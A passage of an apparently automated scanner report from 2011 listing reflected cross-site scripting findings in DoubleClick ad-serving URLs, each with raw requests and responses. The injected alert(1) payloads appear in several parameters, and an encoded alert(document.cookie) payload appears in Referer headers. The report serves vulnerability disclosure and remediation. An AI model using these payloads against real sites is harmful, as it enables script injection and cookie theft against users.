Referer: http://tag.admeld.com/ad/iframe/185/thechive_sites/300x250/thechive_us?t=1297045626926&tz=360&hu=&ht=js&hp=0&url=http%3A%2F%2Fthechive.com%2F%3F45f7b%2522%253E%253Cscript%253Ealert(1)%253C%2Fscript%253Ed3d5acd1ad9%3D1&refer=http%3A%2F%2Fburp%2Fshow%2F22
Accept: */*
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.13 (KHTML, like Gecko) Chrome/9.0.597.84 Safari/534.13
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: id=c653243310000d9|189445/973580/15010,2818894/957634/15009,2409535/850532/15008,1352495/437351/15008|t=1294099968|et=730|cs=gfdmbifc

Response

HTTP/1.1 200 OK
Server: DCLK-AdSvr
Content-Type: application/x-javascript
Date: Mon, 07 Feb 2011 02:27:02 GMT
Cache-Control: private, x-gzip-ok=""
Content-Length: 5832

document.write('<!-- Copyright 2008 DoubleClick, a division of Google Inc. All rights reserved. -->\r\n<!-- Code auto-generated on Thu Jan 20 17:08:58 EST 2011 -->\r\n<script src=\"http://s0.2mdn.net/
...[SNIP]...
://ad.doubleclick.net/click%3Bh%3Dv8/3aa7/f/7e/%2a/l%3B235303334%3B0-0%3B0%3B59104090%3B4307-300/250%3B40362855/40380642/1%3B%3B%7Esscs%3D%3fhttp://pixel.mathtag.com/click/img?mt_aid=11506265788370875860df4'-alert(1)-'c9f82baf3eb&mt_id=108209&mt_adid=100293&redirect=http%3a%2f%2fclk.redcated/GRK/go/296095966/direct/01/\">
...[SNIP]...

1.9. http://ad.doubleclick.net/adj/N4881.mmath/B5233701.14 [mt_adid parameter]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://ad.doubleclick.net
Path:   /adj/N4881.mmath/B5233701.14

Issue detail

The value of the mt_adid request parameter is copied into a JavaScript string which is encapsulated in double quotation marks. The payload 1ee78"-alert(1)-"efef978bc1a was submitted in the mt_adid parameter. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Remediation detail

Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.

Request

GET /adj/N4881.mmath/B5233701.14;sz=160x600;click1=http://pixel.mathtag.com/click/img?mt_aid=140093500725271895&mt_id=109456&mt_adid=1002931ee78"-alert(1)-"efef978bc1a&redirect=;ord=140093500725271895? HTTP/1.1
Host: ad.doubleclick.net
Proxy-Connection: keep-alive
Referer: http://tag.admeld.com/ad/iframe/185/thechive_sites/160x600/thechive_us?t=1297045627687&tz=360&hu=&ht=js&hp=0&url=http%3A%2F%2Fthechive.com%2F%3F45f7b%2522%253E%253Cscript%253Ealert(1)%253C%2Fscript%253Ed3d5acd1ad9%3D1&refer=http%3A%2F%2Fburp%2Fshow%2F22
Accept: */*
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.13 (KHTML, like Gecko) Chrome/9.0.597.84 Safari/534.13
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: id=c653243310000d9|189445/973580/15010,2818894/957634/15009,2409535/850532/15008,1352495/437351/15008|t=1294099968|et=730|cs=gfdmbifc

Response

HTTP/1.1 200 OK
Server: DCLK-AdSvr
Content-Type: application/x-javascript
Date: Mon, 07 Feb 2011 02:27:16 GMT
Cache-Control: private, x-gzip-ok=""
Content-Length: 5940

document.write('<!-- Copyright 2008 DoubleClick, a division of Google Inc. All rights reserved. -->\r\n<!-- Code auto-generated on Thu Feb 03 04:31:52 EST 2011 -->\r\n<script src=\"http://s0.2mdn.net/
...[SNIP]...
3Bh%3Dv8/3aa7/f/7e/%2a/m%3B235905438%3B0-0%3B0%3B59689842%3B2321-160/600%3B40558590/40576377/1%3B%3B%7Esscs%3D%3fhttp://pixel.mathtag.com/click/img?mt_aid=140093500725271895&mt_id=109456&mt_adid=1002931ee78"-alert(1)-"efef978bc1a&redirect=http%3a%2f%2fwww.proactiv.com/lp/em_overnight/%3Fuci%3DUS-PA-O-DI-OM-2297");
var fscUrl = url;
var fscUrlClickTagFound = false;
var wmode = "opaque";
var bg = "";
var dcallowscriptaccess
...[SNIP]...

1.10. http://ad.doubleclick.net/adj/N4881.mmath/B5233701.14 [mt_adid parameter]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://ad.doubleclick.net
Path:   /adj/N4881.mmath/B5233701.14

Issue detail

The value of the mt_adid request parameter is copied into a JavaScript string which is encapsulated in single quotation marks. The payload 2a7dc'-alert(1)-'55516c4309 was submitted in the mt_adid parameter. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Remediation detail

Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.

Request

GET /adj/N4881.mmath/B5233701.14;sz=160x600;click1=http://pixel.mathtag.com/click/img?mt_aid=140093500725271895&mt_id=109456&mt_adid=1002932a7dc'-alert(1)-'55516c4309&redirect=;ord=140093500725271895? HTTP/1.1
Host: ad.doubleclick.net
Proxy-Connection: keep-alive
Referer: http://tag.admeld.com/ad/iframe/185/thechive_sites/160x600/thechive_us?t=1297045627687&tz=360&hu=&ht=js&hp=0&url=http%3A%2F%2Fthechive.com%2F%3F45f7b%2522%253E%253Cscript%253Ealert(1)%253C%2Fscript%253Ed3d5acd1ad9%3D1&refer=http%3A%2F%2Fburp%2Fshow%2F22
Accept: */*
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.13 (KHTML, like Gecko) Chrome/9.0.597.84 Safari/534.13
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: id=c653243310000d9|189445/973580/15010,2818894/957634/15009,2409535/850532/15008,1352495/437351/15008|t=1294099968|et=730|cs=gfdmbifc

Response

HTTP/1.1 200 OK
Server: DCLK-AdSvr
Content-Type: application/x-javascript
Date: Mon, 07 Feb 2011 02:27:21 GMT
Cache-Control: private, x-gzip-ok=""
Content-Length: 5936

document.write('<!-- Copyright 2008 DoubleClick, a division of Google Inc. All rights reserved. -->\r\n<!-- Code auto-generated on Thu Feb 03 04:31:52 EST 2011 -->\r\n<script src=\"http://s0.2mdn.net/
...[SNIP]...
3Bh%3Dv8/3aa7/f/7d/%2a/m%3B235905438%3B0-0%3B0%3B59689842%3B2321-160/600%3B40558590/40576377/1%3B%3B%7Esscs%3D%3fhttp://pixel.mathtag.com/click/img?mt_aid=140093500725271895&mt_id=109456&mt_adid=1002932a7dc'-alert(1)-'55516c4309&redirect=http%3a%2f%2fwww.proactiv.com/lp/em_overnight/%3Fuci%3DUS-PA-O-DI-OM-2297\">
...[SNIP]...

1.11. http://ad.doubleclick.net/adj/N4881.mmath/B5233701.14 [mt_id parameter]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://ad.doubleclick.net
Path:   /adj/N4881.mmath/B5233701.14

Issue detail

The value of the mt_id request parameter is copied into a JavaScript string which is encapsulated in double quotation marks. The payload b51b4"-alert(1)-"a1b3e2ed110 was submitted in the mt_id parameter. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Remediation detail

Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.

Request

GET /adj/N4881.mmath/B5233701.14;sz=160x600;click1=http://pixel.mathtag.com/click/img?mt_aid=140093500725271895&mt_id=109456b51b4"-alert(1)-"a1b3e2ed110&mt_adid=100293&redirect=;ord=140093500725271895? HTTP/1.1
Host: ad.doubleclick.net
Proxy-Connection: keep-alive
Referer: http://tag.admeld.com/ad/iframe/185/thechive_sites/160x600/thechive_us?t=1297045627687&tz=360&hu=&ht=js&hp=0&url=http%3A%2F%2Fthechive.com%2F%3F45f7b%2522%253E%253Cscript%253Ealert(1)%253C%2Fscript%253Ed3d5acd1ad9%3D1&refer=http%3A%2F%2Fburp%2Fshow%2F22
Accept: */*
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.13 (KHTML, like Gecko) Chrome/9.0.597.84 Safari/534.13
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: id=c653243310000d9|189445/973580/15010,2818894/957634/15009,2409535/850532/15008,1352495/437351/15008|t=1294099968|et=730|cs=gfdmbifc

Response

HTTP/1.1 200 OK
Server: DCLK-AdSvr
Content-Type: application/x-javascript
Date: Mon, 07 Feb 2011 02:27:08 GMT
Cache-Control: private, x-gzip-ok=""
Content-Length: 5940

document.write('<!-- Copyright 2008 DoubleClick, a division of Google Inc. All rights reserved. -->\r\n<!-- Code auto-generated on Thu Feb 03 04:31:52 EST 2011 -->\r\n<script src=\"http://s0.2mdn.net/
...[SNIP]...
lick.net/click%3Bh%3Dv8/3aa7/f/7e/%2a/m%3B235905438%3B0-0%3B0%3B59689842%3B2321-160/600%3B40558590/40576377/1%3B%3B%7Esscs%3D%3fhttp://pixel.mathtag.com/click/img?mt_aid=140093500725271895&mt_id=109456b51b4"-alert(1)-"a1b3e2ed110&mt_adid=100293&redirect=http%3a%2f%2fwww.proactiv.com/lp/em_overnight/%3Fuci%3DUS-PA-O-DI-OM-2297");
var fscUrl = url;
var fscUrlClickTagFound = false;
var wmode = "opaque";
var bg = "";
var dcal
...[SNIP]...

1.12. http://ad.doubleclick.net/adj/N4881.mmath/B5233701.14 [mt_id parameter]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://ad.doubleclick.net
Path:   /adj/N4881.mmath/B5233701.14

Issue detail

The value of the mt_id request parameter is copied into a JavaScript string which is encapsulated in single quotation marks. The payload 89c2c'-alert(1)-'91bc6693606 was submitted in the mt_id parameter. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Remediation detail

Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.

Request

GET /adj/N4881.mmath/B5233701.14;sz=160x600;click1=http://pixel.mathtag.com/click/img?mt_aid=140093500725271895&mt_id=10945689c2c'-alert(1)-'91bc6693606&mt_adid=100293&redirect=;ord=140093500725271895? HTTP/1.1
Host: ad.doubleclick.net
Proxy-Connection: keep-alive
Referer: http://tag.admeld.com/ad/iframe/185/thechive_sites/160x600/thechive_us?t=1297045627687&tz=360&hu=&ht=js&hp=0&url=http%3A%2F%2Fthechive.com%2F%3F45f7b%2522%253E%253Cscript%253Ealert(1)%253C%2Fscript%253Ed3d5acd1ad9%3D1&refer=http%3A%2F%2Fburp%2Fshow%2F22
Accept: */*
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.13 (KHTML, like Gecko) Chrome/9.0.597.84 Safari/534.13
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: id=c653243310000d9|189445/973580/15010,2818894/957634/15009,2409535/850532/15008,1352495/437351/15008|t=1294099968|et=730|cs=gfdmbifc

Response

HTTP/1.1 200 OK
Server: DCLK-AdSvr
Content-Type: application/x-javascript
Date: Mon, 07 Feb 2011 02:27:12 GMT
Cache-Control: private, x-gzip-ok=""
Content-Length: 5940

document.write('<!-- Copyright 2008 DoubleClick, a division of Google Inc. All rights reserved. -->\r\n<!-- Code auto-generated on Thu Feb 03 04:31:52 EST 2011 -->\r\n<script src=\"http://s0.2mdn.net/
...[SNIP]...
lick.net/click%3Bh%3Dv8/3aa7/f/7e/%2a/m%3B235905438%3B0-0%3B0%3B59689842%3B2321-160/600%3B40558590/40576377/1%3B%3B%7Esscs%3D%3fhttp://pixel.mathtag.com/click/img?mt_aid=140093500725271895&mt_id=10945689c2c'-alert(1)-'91bc6693606&mt_adid=100293&redirect=http%3a%2f%2fwww.proactiv.com/lp/em_overnight/%3Fuci%3DUS-PA-O-DI-OM-2297\">
...[SNIP]...

1.13. http://ad.doubleclick.net/adj/N4881.mmath/B5233701.14 [redirect parameter]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://ad.doubleclick.net
Path:   /adj/N4881.mmath/B5233701.14

Issue detail

The value of the redirect request parameter is copied into a JavaScript string which is encapsulated in single quotation marks. The payload 16119'-alert(1)-'79d788ac1d9 was submitted in the redirect parameter. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Remediation detail

Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.

Request

GET /adj/N4881.mmath/B5233701.14;sz=160x600;click1=http://pixel.mathtag.com/click/img?mt_aid=140093500725271895&mt_id=109456&mt_adid=100293&redirect=16119'-alert(1)-'79d788ac1d9 HTTP/1.1
Host: ad.doubleclick.net
Proxy-Connection: keep-alive
Referer: http://tag.admeld.com/ad/iframe/185/thechive_sites/160x600/thechive_us?t=1297045627687&tz=360&hu=&ht=js&hp=0&url=http%3A%2F%2Fthechive.com%2F%3F45f7b%2522%253E%253Cscript%253Ealert(1)%253C%2Fscript%253Ed3d5acd1ad9%3D1&refer=http%3A%2F%2Fburp%2Fshow%2F22
Accept: */*
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.13 (KHTML, like Gecko) Chrome/9.0.597.84 Safari/534.13
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: id=c653243310000d9|189445/973580/15010,2818894/957634/15009,2409535/850532/15008,1352495/437351/15008|t=1294099968|et=730|cs=gfdmbifc

Response

HTTP/1.1 200 OK
Server: DCLK-AdSvr
Content-Type: application/x-javascript
Content-Length: 5940
Cache-Control: no-cache
Pragma: no-cache
Date: Mon, 07 Feb 2011 02:27:29 GMT
Expires: Mon, 07 Feb 2011 02:27:29 GMT

document.write('<!-- Copyright 2008 DoubleClick, a division of Google Inc. All rights reserved. -->\r\n<!-- Code auto-generated on Thu Feb 03 04:31:52 EST 2011 -->\r\n<script src=\"http://s0.2mdn.net/
...[SNIP]...
aa7/f/7e/%2a/m%3B235905438%3B0-0%3B0%3B59689842%3B2321-160/600%3B40558590/40576377/1%3B%3B%7Esscs%3D%3fhttp://pixel.mathtag.com/click/img?mt_aid=140093500725271895&mt_id=109456&mt_adid=100293&redirect=16119'-alert(1)-'79d788ac1d9http%3a%2f%2fwww.proactiv.com/lp/em_overnight/%3Fuci%3DUS-PA-O-DI-OM-2297\">
...[SNIP]...

1.14. http://ad.doubleclick.net/adj/N4881.mmath/B5233701.14 [redirect parameter]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://ad.doubleclick.net
Path:   /adj/N4881.mmath/B5233701.14

Issue detail

The value of the redirect request parameter is copied into a JavaScript string which is encapsulated in double quotation marks. The payload f9b42"-alert(1)-"bb18e09f345 was submitted in the redirect parameter. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Remediation detail

Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.

Request

GET /adj/N4881.mmath/B5233701.14;sz=160x600;click1=http://pixel.mathtag.com/click/img?mt_aid=140093500725271895&mt_id=109456&mt_adid=100293&redirect=f9b42"-alert(1)-"bb18e09f345 HTTP/1.1
Host: ad.doubleclick.net
Proxy-Connection: keep-alive
Referer: http://tag.admeld.com/ad/iframe/185/thechive_sites/160x600/thechive_us?t=1297045627687&tz=360&hu=&ht=js&hp=0&url=http%3A%2F%2Fthechive.com%2F%3F45f7b%2522%253E%253Cscript%253Ealert(1)%253C%2Fscript%253Ed3d5acd1ad9%3D1&refer=http%3A%2F%2Fburp%2Fshow%2F22
Accept: */*
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.13 (KHTML, like Gecko) Chrome/9.0.597.84 Safari/534.13
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: id=c653243310000d9|189445/973580/15010,2818894/957634/15009,2409535/850532/15008,1352495/437351/15008|t=1294099968|et=730|cs=gfdmbifc

Response

HTTP/1.1 200 OK
Server: DCLK-AdSvr
Content-Type: application/x-javascript
Content-Length: 5940
Cache-Control: no-cache
Pragma: no-cache
Date: Mon, 07 Feb 2011 02:27:25 GMT
Expires: Mon, 07 Feb 2011 02:27:25 GMT

document.write('<!-- Copyright 2008 DoubleClick, a division of Google Inc. All rights reserved. -->\r\n<!-- Code auto-generated on Thu Feb 03 04:31:52 EST 2011 -->\r\n<script src=\"http://s0.2mdn.net/
...[SNIP]...
aa7/f/7e/%2a/m%3B235905438%3B0-0%3B0%3B59689842%3B2321-160/600%3B40558590/40576377/1%3B%3B%7Esscs%3D%3fhttp://pixel.mathtag.com/click/img?mt_aid=140093500725271895&mt_id=109456&mt_adid=100293&redirect=f9b42"-alert(1)-"bb18e09f345http%3a%2f%2fwww.proactiv.com/lp/em_overnight/%3Fuci%3DUS-PA-O-DI-OM-2297");
var fscUrl = url;
var fscUrlClickTagFound = false;
var wmode = "opaque";
var bg = "";
var dcallowscriptaccess = "never"
...[SNIP]...

1.15. http://ad.doubleclick.net/adj/N4881.mmath/B5233701.14 [sz parameter]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://ad.doubleclick.net
Path:   /adj/N4881.mmath/B5233701.14

Issue detail

The value of the sz request parameter is copied into a JavaScript string which is encapsulated in double quotation marks. The payload 6f009"-alert(1)-"a91a102c09b was submitted in the sz parameter. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Remediation detail

Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.

Request

GET /adj/N4881.mmath/B5233701.14;sz=160x600;click1=http://pixel.mathtag.com/click/img?mt_aid=1400935007252718956f009"-alert(1)-"a91a102c09b&mt_id=109456&mt_adid=100293&redirect=;ord=140093500725271895? HTTP/1.1
Host: ad.doubleclick.net
Proxy-Connection: keep-alive
Referer: http://tag.admeld.com/ad/iframe/185/thechive_sites/160x600/thechive_us?t=1297045627687&tz=360&hu=&ht=js&hp=0&url=http%3A%2F%2Fthechive.com%2F%3F45f7b%2522%253E%253Cscript%253Ealert(1)%253C%2Fscript%253Ed3d5acd1ad9%3D1&refer=http%3A%2F%2Fburp%2Fshow%2F22
Accept: */*
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.13 (KHTML, like Gecko) Chrome/9.0.597.84 Safari/534.13
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: id=c653243310000d9|189445/973580/15010,2818894/957634/15009,2409535/850532/15008,1352495/437351/15008|t=1294099968|et=730|cs=gfdmbifc

Response

HTTP/1.1 200 OK
Server: DCLK-AdSvr
Content-Type: application/x-javascript
Date: Mon, 07 Feb 2011 02:26:59 GMT
Cache-Control: private, x-gzip-ok=""
Content-Length: 5940

document.write('<!-- Copyright 2008 DoubleClick, a division of Google Inc. All rights reserved. -->\r\n<!-- Code auto-generated on Thu Feb 03 04:31:52 EST 2011 -->\r\n<script src=\"http://s0.2mdn.net/
...[SNIP]...
://ad.doubleclick.net/click%3Bh%3Dv8/3aa7/f/7e/%2a/m%3B235905438%3B0-0%3B0%3B59689842%3B2321-160/600%3B40558590/40576377/1%3B%3B%7Esscs%3D%3fhttp://pixel.mathtag.com/click/img?mt_aid=1400935007252718956f009"-alert(1)-"a91a102c09b&mt_id=109456&mt_adid=100293&redirect=http%3a%2f%2fwww.proactiv.com/lp/em_overnight/%3Fuci%3DUS-PA-O-DI-OM-2297");
var fscUrl = url;
var fscUrlClickTagFound = false;
var wmode = "opaque";
var bg =
...[SNIP]...

1.16. http://ad.doubleclick.net/adj/N4881.mmath/B5233701.14 [sz parameter]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://ad.doubleclick.net
Path:   /adj/N4881.mmath/B5233701.14

Issue detail

The value of the sz request parameter is copied into a JavaScript string which is encapsulated in single quotation marks. The payload 5b7ca'-alert(1)-'06a06d14574 was submitted in the sz parameter. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Remediation detail

Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.

Request

GET /adj/N4881.mmath/B5233701.14;sz=160x600;click1=http://pixel.mathtag.com/click/img?mt_aid=1400935007252718955b7ca'-alert(1)-'06a06d14574&mt_id=109456&mt_adid=100293&redirect=;ord=140093500725271895? HTTP/1.1
Host: ad.doubleclick.net
Proxy-Connection: keep-alive
Referer: http://tag.admeld.com/ad/iframe/185/thechive_sites/160x600/thechive_us?t=1297045627687&tz=360&hu=&ht=js&hp=0&url=http%3A%2F%2Fthechive.com%2F%3F45f7b%2522%253E%253Cscript%253Ealert(1)%253C%2Fscript%253Ed3d5acd1ad9%3D1&refer=http%3A%2F%2Fburp%2Fshow%2F22
Accept: */*
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.13 (KHTML, like Gecko) Chrome/9.0.597.84 Safari/534.13
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: id=c653243310000d9|189445/973580/15010,2818894/957634/15009,2409535/850532/15008,1352495/437351/15008|t=1294099968|et=730|cs=gfdmbifc

Response

HTTP/1.1 200 OK
Server: DCLK-AdSvr
Content-Type: application/x-javascript
Date: Mon, 07 Feb 2011 02:27:03 GMT
Cache-Control: private, x-gzip-ok=""
Content-Length: 5940

document.write('<!-- Copyright 2008 DoubleClick, a division of Google Inc. All rights reserved. -->\r\n<!-- Code auto-generated on Thu Feb 03 04:31:52 EST 2011 -->\r\n<script src=\"http://s0.2mdn.net/
...[SNIP]...
://ad.doubleclick.net/click%3Bh%3Dv8/3aa7/f/7e/%2a/m%3B235905438%3B0-0%3B0%3B59689842%3B2321-160/600%3B40558590/40576377/1%3B%3B%7Esscs%3D%3fhttp://pixel.mathtag.com/click/img?mt_aid=1400935007252718955b7ca'-alert(1)-'06a06d14574&mt_id=109456&mt_adid=100293&redirect=http%3a%2f%2fwww.proactiv.com/lp/em_overnight/%3Fuci%3DUS-PA-O-DI-OM-2297\">
...[SNIP]...

1.17. http://ad.doubleclick.net/adj/N6010.133090.MEDIAMATH/B4632508.2 [mt_adid parameter]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://ad.doubleclick.net
Path:   /adj/N6010.133090.MEDIAMATH/B4632508.2

Issue detail

The value of the mt_adid request parameter is copied into a JavaScript string which is encapsulated in single quotation marks. The payload ada57'-alert(1)-'9f353877624 was submitted in the mt_adid parameter. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Remediation detail

Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.

Request

GET /adj/N6010.133090.MEDIAMATH/B4632508.2;sz=728x90;click1=http://pixel.mathtag.com/click/img?mt_aid=60685033116147109&mt_id=103149&mt_adid=76ada57'-alert(1)-'9f353877624&mt_uuid=4d3702bc-839e-0690-5370-3c19a9561295&redirect=;ord=60685033116147109? HTTP/1.1
Host: ad.doubleclick.net
Proxy-Connection: keep-alive
Referer: http://tag.admeld.com/ad/iframe/185/thechive_sites/728x90/thechive_us?t=1297045705115&tz=360&hu=&ht=js&hp=0&url=http%3A%2F%2Fthechive.com%2F%3F45f7b%2522%253E%253Cscript%253Ealert(%2564%256F%2563%2575%256D%2565%256E%2574%252E%2563%256F%256F%256B%2569%2565)%253C%2Fscript%253Ed3d5acd1ad9%3D1&refer=http%3A%2F%2Fburp%2Fshow%2F25
Accept: */*
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.13 (KHTML, like Gecko) Chrome/9.0.597.84 Safari/534.13
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: id=c653243310000d9|189445/973580/15010,2818894/957634/15009,2409535/850532/15008,1352495/437351/15008|t=1294099968|et=730|cs=gfdmbifc

Response

HTTP/1.1 200 OK
Server: DCLK-AdSvr
Content-Type: application/x-javascript
Date: Mon, 07 Feb 2011 02:28:43 GMT
Cache-Control: private, x-gzip-ok=""
Content-Length: 6046

document.write('<!-- Copyright 2008 DoubleClick, a division of Google Inc. All rights reserved. -->\r\n<!-- Code auto-generated on Fri Dec 17 10:10:39 EST 2010 -->\r\n<script src=\"http://s0.2mdn.net/
...[SNIP]...
click%3Bh%3Dv8/3aa7/f/a6/%2a/t%3B233938245%3B0-0%3B0%3B50024984%3B3454-728/90%3B39890603/39908390/1%3B%3B%7Esscs%3D%3fhttp://pixel.mathtag.com/click/img?mt_aid=60685033116147109&mt_id=103149&mt_adid=76ada57'-alert(1)-'9f353877624&mt_uuid=4d3702bc-839e-0690-5370-3c19a9561295&redirect=http%3a%2f%2fwww.lloydstsb-offshore.com/international-current-accounts/%3FWT.mc_id%3DPIA_MM_DR\">
...[SNIP]...

1.18. http://ad.doubleclick.net/adj/N6010.133090.MEDIAMATH/B4632508.2 [mt_adid parameter]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://ad.doubleclick.net
Path:   /adj/N6010.133090.MEDIAMATH/B4632508.2

Issue detail

The value of the mt_adid request parameter is copied into a JavaScript string which is encapsulated in double quotation marks. The payload 94135"-alert(1)-"27645e01241 was submitted in the mt_adid parameter. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Remediation detail

Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.

Request

GET /adj/N6010.133090.MEDIAMATH/B4632508.2;sz=728x90;click1=http://pixel.mathtag.com/click/img?mt_aid=60685033116147109&mt_id=103149&mt_adid=7694135"-alert(1)-"27645e01241&mt_uuid=4d3702bc-839e-0690-5370-3c19a9561295&redirect=;ord=60685033116147109? HTTP/1.1
Host: ad.doubleclick.net
Proxy-Connection: keep-alive
Referer: http://tag.admeld.com/ad/iframe/185/thechive_sites/728x90/thechive_us?t=1297045705115&tz=360&hu=&ht=js&hp=0&url=http%3A%2F%2Fthechive.com%2F%3F45f7b%2522%253E%253Cscript%253Ealert(%2564%256F%2563%2575%256D%2565%256E%2574%252E%2563%256F%256F%256B%2569%2565)%253C%2Fscript%253Ed3d5acd1ad9%3D1&refer=http%3A%2F%2Fburp%2Fshow%2F25
Accept: */*
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.13 (KHTML, like Gecko) Chrome/9.0.597.84 Safari/534.13
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: id=c653243310000d9|189445/973580/15010,2818894/957634/15009,2409535/850532/15008,1352495/437351/15008|t=1294099968|et=730|cs=gfdmbifc

Response

HTTP/1.1 200 OK
Server: DCLK-AdSvr
Content-Type: application/x-javascript
Date: Mon, 07 Feb 2011 02:28:38 GMT
Cache-Control: private, x-gzip-ok=""
Content-Length: 6046

document.write('<!-- Copyright 2008 DoubleClick, a division of Google Inc. All rights reserved. -->\r\n<!-- Code auto-generated on Fri Dec 17 10:10:39 EST 2010 -->\r\n<script src=\"http://s0.2mdn.net/
...[SNIP]...
click%3Bh%3Dv8/3aa7/f/a6/%2a/t%3B233938245%3B0-0%3B0%3B50024984%3B3454-728/90%3B39890603/39908390/1%3B%3B%7Esscs%3D%3fhttp://pixel.mathtag.com/click/img?mt_aid=60685033116147109&mt_id=103149&mt_adid=7694135"-alert(1)-"27645e01241&mt_uuid=4d3702bc-839e-0690-5370-3c19a9561295&redirect=http%3a%2f%2fwww.lloydstsb-offshore.com/international-current-accounts/%3FWT.mc_id%3DPIA_MM_DR");
var fscUrl = url;
var fscUrlClickTagFound = fa
...[SNIP]...

1.19. http://ad.doubleclick.net/adj/N6010.133090.MEDIAMATH/B4632508.2 [mt_id parameter]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://ad.doubleclick.net
Path:   /adj/N6010.133090.MEDIAMATH/B4632508.2

Issue detail

The value of the mt_id request parameter is copied into a JavaScript string which is encapsulated in single quotation marks. The payload bf570'-alert(1)-'8d2303ed4ad was submitted in the mt_id parameter. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Remediation detail

Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.

Request

